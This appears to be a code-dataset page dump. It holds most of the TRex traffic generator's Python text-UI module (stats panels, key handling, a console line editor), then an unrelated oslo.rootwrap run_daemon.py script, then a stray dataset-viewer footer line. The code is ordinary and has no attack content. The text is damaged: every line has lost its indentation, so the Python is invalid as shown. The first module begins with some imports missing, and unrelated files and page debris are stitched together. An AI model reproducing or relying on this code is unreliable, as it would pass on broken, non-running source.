from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
pass
def ascii_split (s):
output = []
lines = s.split('\n')
for elem in lines:
if ansi_len(elem) > 0:
output.append(elem)
return output
class SimpleBar(object):
def __init__ (self, desc, pattern):
self.desc = desc
self.pattern = pattern
self.pattern_len = len(pattern)
self.index = 0
def show (self, buffer):
if self.desc:
print(format_text("{0} {1}".format(self.desc, self.pattern[self.index]), 'bold'), file = buffer)
else:
print(format_text("{0}".format(self.pattern[self.index]), 'bold'), file = buffer)
self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
def __init__ (self, mng, name):
self.mng = mng
self.name = name
self.client = mng.client
self.is_graph = False
def show (self, buffer):
raise NotImplementedError("must implement this")
def get_key_actions (self):
raise NotImplementedError("must implement this")
def get_name (self):
return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
FILTER_ACQUIRED = 1
FILTER_ALL = 2
def __init__ (self, mng):
super(TrexTUIDashBoard, self).__init__(mng, "dashboard")
self.ports = self.client.get_all_ports()
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}
# register all the ports to the toggle action
for port_id in self.ports:
self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}
self.toggle_filter = ToggleFilter(self.ports)
if self.client.get_acquired_ports():
self.action_show_owned()
else:
self.action_show_all()
def get_showed_ports (self):
return self.toggle_filter.filter_items()
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.get_showed_ports():
self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)
def get_key_actions (self):
allowed = OrderedDict()
allowed['n'] = self.key_actions['n']
allowed['o'] = self.key_actions['o']
allowed['a'] = self.key_actions['a']
for i in self.ports:
allowed[str(i)] = self.key_actions[str(i)]
if self.get_showed_ports():
allowed['c'] = self.key_actions['c']
# if not all ports are acquired - no operations
if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
return allowed
if self.client.get_mode() == 'STL':
# if any/some ports can be resumed
if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
allowed['r'] = self.key_actions['r']
# if any/some ports are transmitting - support those actions
if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
allowed['p'] = self.key_actions['p']
return allowed
######### actions
def action_pause (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
try:
rc = self.client.pause(ports = ports)
except TRexError:
pass
return ""
def action_resume (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
try:
self.client.resume(ports = ports)
except TRexError:
pass
return ""
def action_reset_view (self):
self.toggle_filter.reset()
return ""
def action_show_owned (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
return ""
def action_show_all (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_all_ports())
return ""
def action_clear (self):
self.client.clear_stats(self.toggle_filter.filter_items())
return "cleared all stats"
def action_toggle_port(self, port_id):
def action_toggle_port_x():
self.toggle_filter.toggle_item(port_id)
return ""
return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_streams_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUILatencyStats, self).__init__(mng, "lstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
self.is_histogram = False
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.is_histogram:
self.client._show_latency_histogram(buffer = buffer)
else:
self.client._show_latency_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_histogram (self):
self.is_histogram = not self.is_histogram
return ""
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
def __init__(self, mng):
super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
self.start_row = 0
self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
self.num_lines = 0
self.tgid = 0
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
buf = StringIO()
try:
self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid)
except ASTFErrorBadTG:
self.tgid = 0
self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid)
buf.seek(0)
out_lines = buf.readlines()
self.num_lines = len(out_lines)
buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
buffer.write('\n')
def get_key_actions(self):
return self.key_actions
def action_clear(self):
self.client.clear_traffic_stats()
return ""
def action_up(self):
if self.start_row > self.num_lines:
self.start_row = self.num_lines
elif self.start_row > 0:
self.start_row -= 1
def action_down(self):
if self.start_row < self.num_lines - self.max_lines:
self.start_row += 1
def action_left(self):
if self.tgid > 0:
self.tgid -= 1
def action_right(self):
if self.tgid < self.client._get_num_of_tgids():
self.tgid += 1
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
self.key_actions = OrderedDict()
self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
self.views = [
{'name': 'main latency', 'func': self.client._show_latency_stats},
{'name': 'histogram', 'func': self.client._show_latency_histogram},
{'name': 'counters', 'func': self.client._show_latency_counters},
]
self.view_index = 0
self.next_view_index = 1
def get_next_view(self):
return "view toggle to '%s'" % self.views[self.next_view_index]['name']
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
self.views[self.view_index]['func'](buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_view(self):
self.view_index = self.next_view_index
self.next_view_index = (1 + self.next_view_index) % len(self.views)
return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
self.key_actions = {}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_cpu_util(buffer = buffer)
self.client._show_mbuf_util(buffer = buffer)
def get_key_actions (self):
return self.key_actions
# log
class TrexTUILog():
def __init__ (self):
self.log = []
def add_event (self, msg):
self.log.append("[{0}] {1}".format(str(datetime.datetime.now().time()), msg))
def show (self, buffer, max_lines = 4):
cut = len(self.log) - max_lines
if cut < 0:
cut = 0
print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
for msg in self.log[cut:]:
print(msg, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
def __init__ (self, func):
self.func = func
def __nonzero__ (self):
return True if self.func() else False
def __bool__ (self):
return True if self.func() else False
# Panels manager (contains server panels)
class TrexTUIPanelManager():
def __init__ (self, tui):
self.tui = tui
self.client = tui.client
self.ports = self.client.get_all_ports()
self.locked = False
self.panels = {}
self.panels['dashboard'] = TrexTUIDashBoard(self)
self.panels['ustats'] = TrexTUIUtilizationStats(self)
self.key_actions = OrderedDict()
# we allow console only when ports are acquired
self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
# HACK - FIX THIS
# stateless specific panels
if self.client.get_mode() == "STL":
self.panels['sstats'] = TrexTUIStreamsStats(self)
self.panels['lstats'] = TrexTUILatencyStats(self)
self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
elif self.client.get_mode() == "ASTF":
self.panels['astats'] = TrexTUIAstfTrafficStats(self)
self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
# start with dashboard
self.main_panel = self.panels['dashboard']
# log object
self.log = TrexTUILog()
self.generate_legend()
self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
self.dis_bar = SimpleBar('status: ', ['X', ' '])
self.show_log = False
def generate_legend(self):
self.legend = "\n{:<12}".format("browse:")
for k, v in self.key_actions.items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
for k, v in self.main_panel.get_key_actions().items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
def print_connection_status (self, buffer):
if self.tui.get_state() == self.tui.STATE_ACTIVE:
self.conn_bar.show(buffer = buffer)
else:
self.dis_bar.show(buffer = buffer)
def print_legend (self, buffer):
print(format_text(self.legend, 'bold'), file = buffer)
# on window switch or turn on / off of the TUI we call this
def init (self, show_log = False, locked = False):
self.show_log = show_log
self.locked = locked
self.generate_legend()
def show (self, show_legend, buffer):
try:
self.main_panel.show(buffer)
except:
if self.client.is_connected():
raise
self.print_connection_status(buffer)
if show_legend:
self.generate_legend()
self.print_legend(buffer)
if self.show_log:
self.log.show(buffer)
def handle_key (self, ch):
# check for the manager registered actions
if ch in self.key_actions:
msg = self.key_actions[ch]['action']()
# check for main panel actions
elif ch in self.main_panel.get_key_actions():
msg = self.main_panel.get_key_actions()[ch]['action']()
else:
return False
self.generate_legend()
return True
#if msg == None:
# return False
#else:
# if msg:
# self.log.add_event(msg)
# return True
# actions
def action_none (self):
return None
def action_show_dash (self):
self.main_panel = self.panels['dashboard']
self.init(self.show_log)
return ""
def action_show_port (self, port_id):
def action_show_port_x ():
self.main_panel = self.panels['port {0}'.format(port_id)]
self.init()
return ""
return action_show_port_x
def action_show_sstats (self):
self.main_panel = self.panels['sstats']
self.init(self.show_log)
return ""
def action_show_astats (self):
self.main_panel = self.panels['astats']
self.init(self.show_log)
return ""
def action_show_lstats (self):
self.main_panel = self.panels['lstats']
self.init(self.show_log)
return ""
def action_show_ustats(self):
self.main_panel = self.panels['ustats']
self.init(self.show_log)
return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
def __init__ (self, redraw_cb):
self.snapshot = ''
self.lock = threading.Lock()
self.redraw_cb = redraw_cb
self.update_flag = False
def start (self):
self.active = True
self.t = threading.Thread(target = self.__handler)
self.t.setDaemon(True)
self.t.start()
def stop (self):
self.active = False
self.t.join()
# request an update
def update (self):
self.update_flag = True
# fetch the screen, return None if no new screen exists yet
def get (self):
if not self.snapshot:
return None
# we have a snapshot - fetch it
with self.lock:
x = self.snapshot
self.snapshot = None
return x
def __handler (self):
while self.active:
if self.update_flag:
self.__redraw()
time.sleep(0.01)
# redraw the next screen
def __redraw (self):
buffer = StringIO()
self.redraw_cb(buffer)
with self.lock:
self.snapshot = buffer
self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
def __init__ (self, rate):
self.ts = 0
self.marked = False
self.rate = rate
self.force = False
def mark_for_redraw (self, force = False):
self.marked = True
if force:
self.force = True
def should_redraw (self):
dt = time.time() - self.ts
return self.force or (self.marked and (dt > self.rate))
def reset (self, restart = False):
self.ts = time.time()
self.marked = restart
self.force = False
# shows a textual top style window
class TrexTUI():
STATE_ACTIVE = 0
STATE_LOST_CONT = 1
STATE_RECONNECT = 2
is_graph = False
_ref_cnt = 0
MIN_ROWS = 45
MIN_COLS = 111
class ScreenSizeException(Exception):
def __init__ (self, cols, rows):
msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
TrexTUI.MIN_ROWS,
cols,
rows)
super(TrexTUI.ScreenSizeException, self).__init__(msg)
def __init__ (self, console):
self.console = console
self.client = console.client
self.tui_global_lock = threading.Lock()
self.pm = TrexTUIPanelManager(self)
self.sb = ScreenBuffer(self.redraw_handler)
TrexTUI._ref_cnt += 1
def __del__(self):
TrexTUI._ref_cnt -= 1
@classmethod
def has_instance(cls):
return cls._ref_cnt > 0
def redraw_handler (self, buffer):
# this is executed by the screen buffer - should be protected against TUI commands
with self.tui_global_lock:
self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
def clear_screen (self, lines = 50):
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
# clear all lines
for i in range(lines):
sys.stdout.write("\x1b[0K")
if i < (lines - 1):
sys.stdout.write("\n")
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
def show (self, client, save_console_history, show_log = False, locked = False):
rows, cols = os.popen('stty size', 'r').read().split()
if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
raise self.ScreenSizeException(rows = rows, cols = cols)
with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
sys.stdout.write("\x1bc")
self.async_keys = async_keys
self.show_internal(show_log, locked)
def show_internal (self, show_log, locked):
self.pm.init(show_log, locked)
self.state = self.STATE_ACTIVE
# create print policers
self.full_redraw = RedrawPolicer(0.5)
self.keys_redraw = RedrawPolicer(0.05)
self.full_redraw.mark_for_redraw()
try:
self.sb.start()
while True:
# draw and handle user input
status = self.async_keys.tick(self.pm)
# prepare the next frame
self.prepare(status)
time.sleep(0.01)
self.draw_screen()
with self.tui_global_lock:
self.handle_state_machine()
except TUIQuit:
print("\nExiting TUI...")
except KeyboardInterrupt:
print("\nExiting TUI...")
finally:
self.sb.stop()
print("")
# handle state machine
def handle_state_machine (self):
# regular state
if self.state == self.STATE_ACTIVE:
# if no connectivity - move to lost connecitivty
if not self.client.is_connected():
self.state = self.STATE_LOST_CONT
# lost connectivity
elif self.state == self.STATE_LOST_CONT:
# if the connection is alive (some data is arriving on the async channel)
# try to reconnect
if self.client.conn.is_alive():
# move to state reconnect
self.state = self.STATE_RECONNECT
# restored connectivity - try to reconnect
elif self.state == self.STATE_RECONNECT:
try:
self.client.connect()
self.client.acquire()
self.state = self.STATE_ACTIVE
except TRexError:
self.state = self.STATE_LOST_CONT
# logic before printing
def prepare (self, status):
if status == AsyncKeys.STATUS_REDRAW_ALL:
self.full_redraw.mark_for_redraw(force = True)
elif status == AsyncKeys.STATUS_REDRAW_KEYS:
self.keys_redraw.mark_for_redraw()
if self.full_redraw.should_redraw():
self.sb.update()
self.full_redraw.reset(restart = True)
return
# draw once
def draw_screen (self):
# check for screen buffer's new screen
x = self.sb.get()
# we have a new screen to draw
if x:
self.clear_screen()
self.async_keys.draw(x)
sys.stdout.write(x.getvalue())
sys.stdout.flush()
# maybe we need to redraw the keys
elif self.keys_redraw.should_redraw():
sys.stdout.write("\x1b[4A")
self.async_keys.draw(sys.stdout)
sys.stdout.flush()
# reset the policer for next time
self.keys_redraw.reset()
def get_state (self):
return self.state
class TokenParser(object):
def __init__ (self, seq):
self.buffer = list(seq)
def pop (self):
return self.buffer.pop(0)
def peek (self):
if not self.buffer:
return None
return self.buffer[0]
def next_token (self):
if not self.peek():
return None
token = self.pop()
# special chars
if token == '\x1b':
while self.peek():
token += self.pop()
return token
def parse (self):
tokens = []
while True:
token = self.next_token()
if token == None:
break
tokens.append(token)
return tokens
# handles async IO
class AsyncKeys:
MODE_LEGEND = 1
MODE_CONSOLE = 2
STATUS_NONE = 0
STATUS_REDRAW_KEYS = 1
STATUS_REDRAW_ALL = 2
def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
self.tui_global_lock = tui_global_lock
self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
self.engine_legend = AsyncKeysEngineLegend(self)
self.locked = locked
if locked:
self.engine = self.engine_legend
self.locked = True
else:
self.engine = self.engine_console
self.locked = False
def __enter__ (self):
# init termios
self.old_settings = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
new_settings[6][termios.VMIN] = 0 # cc
new_settings[6][termios.VTIME] = 0 # cc
# huge buffer - no print without flush
sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
return self
def __exit__ (self, type, value, traceback):
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)
# restore sys.stdout
sys.stdout.close()
sys.stdout = sys.__stdout__
def is_legend_mode (self):
return self.engine.get_type() == AsyncKeys.MODE_LEGEND
def is_console_mode (self):
return self.engine.get_type == AsyncKeys.MODE_CONSOLE
def switch (self):
if self.is_legend_mode():
self.engine = self.engine_console
else:
self.engine = self.engine_legend
def handle_token (self, token, pm):
# ESC for switch
if token == '\x1b':
if not self.locked:
self.switch()
return self.STATUS_REDRAW_ALL
# EOF (ctrl + D)
if token == '\x04':
raise TUIQuit()
# pass tick to engine
return self.engine.tick(token, pm)
def tick (self, pm):
rc = self.STATUS_NONE
# fetch the stdin buffer
seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
if not seq:
return self.STATUS_NONE
# parse all the tokens from the buffer
tokens = TokenParser(seq).parse()
# process them
for token in tokens:
token_rc = self.handle_token(token, pm)
rc = max(rc, token_rc)
return rc
def draw (self, buffer):
self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
def __init__ (self, async):
self.async = async
def get_type (self):
return self.async.MODE_LEGEND
def tick (self, seq, pm):
if seq == 'q':
raise TUIQuit()
if len(seq) > 1:
if seq == '\x1b\x5b\x41': # scroll up
pm.handle_key('Up')
if seq == '\x1b\x5b\x42': # scroll down
pm.handle_key('Down')
if seq == '\x1b\x5b\x43': # scroll right
pm.handle_key('Right')
if seq == '\x1b\x5b\x44': # scroll left
pm.handle_key('Left')
return AsyncKeys.STATUS_NONE
rc = pm.handle_key(seq)
return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE
def draw (self, buffer):
pass
# console engine
class AsyncKeysEngineConsole:
def __init__ (self, async, console, client, save_console_history):
self.async = async
self.lines = deque(maxlen = 100)
self.generate_prompt = console.generate_prompt
self.save_console_history = save_console_history
self.ac = client.get_console_methods()
self.ac.update({'quit' : self.action_quit,
'q' : self.action_quit,
'exit' : self.action_quit,
'help' : self.action_help,
'?' : self.action_help})
# fetch readline history and add relevants
for i in range(1, readline.get_current_history_length()):
cmd = readline.get_history_item(i)
if cmd.strip() and cmd.split()[0] in self.ac:
self.lines.appendleft(CmdLine(cmd))
# new line
self.lines.appendleft(CmdLine(''))
self.line_index = 0
self.last_status = ''
def action_quit (self, _):
raise TUIQuit()
def action_help (self, _):
return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])
def get_type (self):
return self.async.MODE_CONSOLE
def handle_escape_char (self, seq):
# up
if seq == '\x1b[A':
self.line_index = min(self.line_index + 1, len(self.lines) - 1)
# down
elif seq == '\x1b[B':
self.line_index = max(self.line_index - 1, 0)
# left
elif seq == '\x1b[D':
self.lines[self.line_index].go_left()
# right
elif seq == '\x1b[C':
self.lines[self.line_index].go_right()
# del
elif seq == '\x1b[3~':
self.lines[self.line_index].del_key()
# home
elif seq in ('\x1b[H', '\x1b\x4fH'):
self.lines[self.line_index].home_key()
# end
elif seq in ('\x1b[F', '\x1b\x4fF'):
self.lines[self.line_index].end_key()
# Alt + Backspace
elif seq == '\x1b\x7f':
pos = orig_pos = self.lines[self.line_index].cursor_index
cut_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
cut_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
cut_to_pos = pos - 1
break
pos -= 1
if cut_to_pos is not None:
self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)
# Alt + Left or Ctrl + Left
elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
move_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
move_to_pos = pos - 1
break
pos -= 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# Alt + Right or Ctrl + Right
elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos <= len(line) - 1:
if pos == len(line) - 1:
move_to_pos = len(line)
elif line[pos] != ' ' and line[pos + 1] == ' ':
move_to_pos = pos + 1
break
pos += 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# PageUp
elif seq == '\x1b\x5b\x35\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index < len(self.lines) - 1:
index += 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# PageDown
elif seq == '\x1b\x5b\x36\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index > 0:
index -= 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# unknown key
else:
return AsyncKeys.STATUS_NONE
return AsyncKeys.STATUS_REDRAW_KEYS
def tick (self, seq, _):
# handle escape chars
if len(seq) > 1:
return self.handle_escape_char(seq)
# handle each char
for ch in seq:
return self.handle_single_key(ch)
def handle_single_key (self, ch):
# newline
if ch == '\n':
self.handle_cmd()
# backspace
elif ch == '\x7f':
self.lines[self.line_index].backspace()
# TAB
elif ch == '\t':
tokens = self.lines[self.line_index].get().split()
if not tokens:
return
if len(tokens) == 1:
self.handle_tab_names(tokens[0])
else:
self.handle_tab_files(tokens)
# simple char
else:
self.lines[self.line_index] += ch
return AsyncKeys.STATUS_REDRAW_KEYS
# handle TAB key for completing function names
def handle_tab_names (self, cur):
matching_cmds = [x for x in self.ac if x.startswith(cur)]
common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
if common:
if len(matching_cmds) == 1:
self.lines[self.line_index].set(common + ' ')
self.last_status = ''
else:
self.lines[self.line_index].set(common)
self.last_status = 'ambigious: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])
# handle TAB for completing filenames
def handle_tab_files (self, tokens):
# only commands with files
if tokens[0] not in {'start', 'push'}:
return
# '-f' with no parameters - no partial and use current dir
if tokens[-1] == '-f':
partial = ''
d = '.'
# got a partial path
elif tokens[-2] == '-f':
partial = tokens.pop()
# check for dirs
dirname, basename = os.path.dirname(partial), os.path.basename(partial)
if os.path.isdir(dirname):
d = dirname
partial = basename
else:
d = '.'
else:
return
# fetch all dirs and files matching wildcard
files = []
for x in os.listdir(d):
if os.path.isdir(os.path.join(d, x)):
files.append(x + '/')
elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
files.append(x)
# dir might not have the files
if not files:
self.last_status = format_text('no loadble files under path', 'bold')
return
# find all the matching files
matching_files = [x for x in files if x.startswith(partial)] if partial else files
# do we have a longer common than partial ?
common = os.path.commonprefix([x for x in files if x.startswith(partial)])
if not common:
common = partial
tokens.append(os.path.join(d, common) if d is not '.' else common)
# reforge the line
newline = ' '.join(tokens)
if len(matching_files) == 1:
if os.path.isfile(tokens[-1]):
newline += ' '
self.lines[self.line_index].set(newline)
self.last_status = ''
else:
self.lines[self.line_index].set(newline)
self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
if len(matching_files) > 5:
self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)
def split_cmd (self, cmd):
s = cmd.split(' ', 1)
op = s[0]
param = s[1] if len(s) == 2 else ''
return op, param
def handle_cmd (self):
cmd = self.lines[self.line_index].get().strip()
if not cmd:
return
op, param = self.split_cmd(cmd)
func = self.ac.get(op)
if func:
with self.async.tui_global_lock:
func_rc = func(param)
# take out the empty line
empty_line = self.lines.popleft()
assert(empty_line.ro_line == '')
if not self.lines or self.lines[0].ro_line != cmd:
self.lines.appendleft(CmdLine(cmd))
# back in
self.lines.appendleft(empty_line)
self.line_index = 0
readline.add_history(cmd)
self.save_console_history()
# back to readonly
for line in self.lines:
line.invalidate()
assert(self.lines[0].modified == False)
color = None
if not func:
self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
else:
# internal commands
if isinstance(func_rc, str):
self.last_status = func_rc
# RC response
else:
# success
if func_rc is None:
self.last_status = format_text("[OK]", 'green')
# errors
else:
err_msgs = ascii_split(str(func_rc))
if not err_msgs:
err_msgs = ['Unknown error']
self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
if len(err_msgs) > 1:
self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
color = 'red'
# trim too long lines
if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')
def draw (self, buffer):
buffer.write("\nPress 'ESC' for navigation panel...\n")
buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
def __init__ (self, line):
self.ro_line = line
self.w_line = None
self.modified = False
self.cursor_index = len(line)
def get (self):
if self.modified:
return self.w_line
else:
return self.ro_line
def set (self, line, cursor_pos = None):
self.w_line = line
self.modified = True
if cursor_pos is None:
self.cursor_index = len(self.w_line)
else:
self.cursor_index = cursor_pos
def __add__ (self, other):
assert(0)
def __str__ (self):
return self.get()
def __iadd__ (self, other):
self.set(self.get()[:self.cursor_index] + other + self.get()[self.cursor_index:],
cursor_pos = self.cursor_index + len(other))
return self
def backspace (self):
if self.cursor_index == 0:
return
self.set(self.get()[:self.cursor_index - 1] + self.get()[self.cursor_index:],
self.cursor_index - 1)
def del_key (self):
if self.cursor_index == len(self.get()):
return
self.set(self.get()[:self.cursor_index] + self.get()[self.cursor_index + 1:],
self.cursor_index)
def home_key (self):
self.cursor_index = 0
def end_key (self):
self.cursor_index = len(self.get())
def invalidate (self):
self.modified = False
self.w_line = None
self.cursor_index = len(self.ro_line)
def go_left (self):
self.cursor_index = max(0, self.cursor_index - 1)
def go_right (self):
self.cursor_index = min(len(self.get()), self.cursor_index + 1)
def draw (self, buffer):
buffer.write(self.get())
buffer.write('\b' * (len(self.get()) - self.cursor_index))
|
run_daemon.py | # Copyright (c) 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import sys
import threading
from oslo_rootwrap import cmd
from oslo_rootwrap import subprocess
def forward_stream(fr, to):
while True:
line = fr.readline()
if not line:
break
to.write(line)
def forwarding_popen(f, old_popen=subprocess.Popen):
def popen(*args, **kwargs):
p = old_popen(*args, **kwargs)
t = threading.Thread(target=forward_stream, args=(p.stderr, f))
t.daemon = True
t.start()
return p
return popen
class nonclosing(object):
def __init__(self, f):
self._f = f
def __getattr__(self, name):
return getattr(self._f, name)
def close(self):
pass
log_format = ("%(asctime)s | [%(process)5s]+%(levelname)5s | "
"%(message)s")
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format=log_format)
sys.stderr = nonclosing(sys.stderr)
cmd.daemon()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.